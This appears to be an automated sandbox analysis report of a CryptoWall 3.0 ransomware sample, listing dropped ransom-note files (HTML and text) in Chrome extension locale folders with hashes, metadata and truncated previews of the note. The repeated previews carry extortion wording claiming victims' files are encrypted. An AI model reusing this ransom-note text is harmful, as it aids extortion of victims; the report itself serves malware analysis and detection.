                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mn\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mn\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\mr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ms\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ms\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\my\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\my\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ne\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\ne\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\nl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\nl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\no\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\no\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\pa\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
